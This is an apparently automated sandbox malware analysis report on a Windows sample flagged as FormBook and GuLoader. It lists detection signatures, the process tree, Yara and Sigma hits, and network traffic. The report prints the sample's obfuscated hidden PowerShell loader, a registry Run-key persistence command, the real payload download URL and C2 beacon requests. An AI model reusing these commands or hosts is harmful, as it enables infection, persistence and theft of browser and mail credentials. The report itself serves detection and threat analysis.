Windows Analysis Report
SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
Analysis ID:1431789
MD5:4621fea50e1982e6f753efe7d1be2b35
SHA1:46072b07bfa96583ed03149a04411cbcf04eadf9
SHA256:6b2874507fc8b7782d11f202840850ba6edd8befbb8c163c4d53775fb8d20603
Tags:exe
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe (PID: 7592 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe" MD5: 4621FEA50E1982E6F753EFE7D1BE2B35)
    • powershell.exe (PID: 7656 cmdline: "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7816 cmdline: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Overfondle.exe (PID: 7376 cmdline: "C:\Users\user\AppData\Local\Temp\Overfondle.exe" MD5: 4621FEA50E1982E6F753EFE7D1BE2B35)
        • cmd.exe (PID: 1352 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 2712 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • rmGjiHyfWQcajCGtrYkAoHJJOdK.exe (PID: 5796 cmdline: "C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • cmd.exe (PID: 6348 cmdline: "C:\Windows\SysWOW64\cmd.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • rmGjiHyfWQcajCGtrYkAoHJJOdK.exe (PID: 5852 cmdline: "C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • firefox.exe (PID: 2180 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x2a590:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13b3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x602c1:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x49870:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

        System Summary

        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)", CommandLine: "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, ParentProcessId: 7592, ParentProcessName: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)", ProcessId: 7656, ProcessName: powershell.exe
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 2712, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Hakkebrttet
        Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1352, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)", ProcessId: 2712, ProcessName: reg.exe
        Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7656, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", ProcessId: 7816, ProcessName: cmd.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Overfondle.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Overfondle.exe, ParentProcessId: 7376, ParentProcessName: Overfondle.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)", ProcessId: 1352, ProcessName: cmd.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)", CommandLine: "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, ParentProcessId: 7592, ParentProcessName: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)", ProcessId: 7656, ProcessName: powershell.exe
        No Snort rule has matched


        AV Detection

        Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
        Source: https://kraljevikonaci.rs/Avira URL Cloud: Label: malware
        Source: https://kraljevikonaci.rs/ETfFmOW246.binAvira URL Cloud: Label: malware
        Source: https://kraljevikonaci.rs/ETfFmOW246.bin5?Avira URL Cloud: Label: malware
        Source: https://kraljevikonaci.rs/ETfFmOW246.binYAvira URL Cloud: Label: malware
        Source: https://kraljevikonaci.rs/ETfFmOW246.binsAvira URL Cloud: Label: malware
        Source: kraljevikonaci.rsVirustotal: Detection: 15%Perma Link
        Source: https://kraljevikonaci.rs/ETfFmOW246.binVirustotal: Detection: 15%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeReversingLabs: Detection: 50%
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeVirustotal: Detection: 60%Perma Link
        Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeReversingLabs: Detection: 50%
        Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeVirustotal: Detection: 57%Perma Link
        Source: Yara matchFile source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeJoe Sandbox ML: detected
        Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeJoe Sandbox ML: detected
        Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 195.252.110.253:443 -> 192.168.2.10:49706 version: TLS 1.2
        Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2075195434.0000000008A34000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.2069285687.0000000007840000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000002.2615448213.0000000000D1E000.00000002.00000001.01000000.0000000C.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000000.2233571308.0000000000D1E000.00000002.00000001.01000000.0000000C.sdmp
        Source: Binary string: wntdll.pdbUGP source: Overfondle.exe, 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2067651043.000000002027C000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2065314777.00000000200C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2169674706.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.0000000003130000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.00000000032CE000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2164405246.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: cmd.pdbUGP source: Overfondle.exe, 00000008.00000003.2127890263.00000000200C1000.00000004.00000020.00020000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000003.2098058163.000000000047B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Overfondle.exe, Overfondle.exe, 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2067651043.000000002027C000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2065314777.00000000200C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000E.00000003.2169674706.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.0000000003130000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.00000000032CE000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2164405246.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
        Source: Binary string: cmd.pdb source: Overfondle.exe, 00000008.00000003.2127890263.00000000200C1000.00000004.00000020.00020000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000003.2098058163.000000000047B000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeCode function: 0_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A19
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeCode function: 0_2_004065CE FindFirstFileA,FindClose,0_2_004065CE
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeCode function: 0_2_004027AA FindFirstFileA,0_2_004027AA
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003DB880 FindFirstFileW,FindNextFileW,FindClose,14_2_003DB880
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Moviedom230\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then xor eax, eax14_2_003C9430
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop edi14_2_003D1DAF
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop edi14_2_003D1DD0
        Source: Joe Sandbox ViewIP Address: 219.94.128.41
        Source: Joe Sandbox ViewIP Address: 217.160.0.183
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /ETfFmOW246.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: kraljevikonaci.rsCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /9pdo/?U06lIV=DnYaRovP48GzkkJ0SsWJ4MnlEFB7/DbwuVP/6iFiedv+ORSC+0oTk/Kl1D7Kx2hOtjeczUyzMCTs4BuiBiMV1f4J24UrdDssz4r6IbwvRD0aCWqy3Q==&VbTh4=rjJH3N1 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.ejbodyart.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
        Source: global trafficHTTP traffic detected: GET /9pdo/?U06lIV=9/X38tn9qLO2xSFr83Mmx4ws3CHxUFQCRmtcXfkuabXCkgKRDBhcw5zs5NSemU/1fww/nV1egvBpaCqwFnieo+CDMv1CzJiFlGe2VwbVhWcu3PKwdg==&VbTh4=rjJH3N1 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.jt-berger.storeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
        Source: global trafficDNS traffic detected: DNS query: kraljevikonaci.rs
        Source: global trafficDNS traffic detected: DNS query: www.ejbodyart.com
        Source: global trafficDNS traffic detected: DNS query: www.jt-berger.store
        Source: global trafficDNS traffic detected: DNS query: www.n-benriya002.com
        Source: unknownHTTP traffic detected: POST /9pdo/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usContent-Type: application/x-www-form-urlencodedContent-Length: 195Connection: closeCache-Control: no-cacheHost: www.jt-berger.storeOrigin: http://www.jt-berger.storeReferer: http://www.jt-berger.store/9pdo/User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Apr 2024 17:25:49 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-Encoding Data Ascii: c7<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /9pdo/ was not found on this server.<P></BODY></HTML>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 25 Apr 2024 17:26:05 GMTServer: ApacheContent-Encoding: gzip
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 25 Apr 2024 17:26:08 GMTServer: ApacheContent-Encoding: gzip
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 25 Apr 2024 17:26:11 GMTServer: ApacheContent-Encoding: gzip
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 601Connection: closeDate: Thu, 25 Apr 2024 17:26:14 GMTServer: Apache
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Apr 2024 17:26:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://n-benriya002.com/wp-json/>; rel="https://api.w.org/"
        Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, Overfondle.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, Overfondle.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: powershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000002.00000002.2064998955.00000000053D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000002.00000002.2064998955.0000000005281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000002.00000002.2064998955.00000000053D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
        Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000002.2616564781.0000000002DE1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.n-benriya002.com
        Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000002.2616564781.0000000002DE1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.n-benriya002.com/9pdo/
        Source: Overfondle.exe, 00000008.00000001.1889349329.00000000005F2000.00000020.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: Overfondle.exe, 00000008.00000001.1889349329.00000000005F2000.00000020.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: powershell.exe, 00000002.00000002.2064998955.0000000005281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
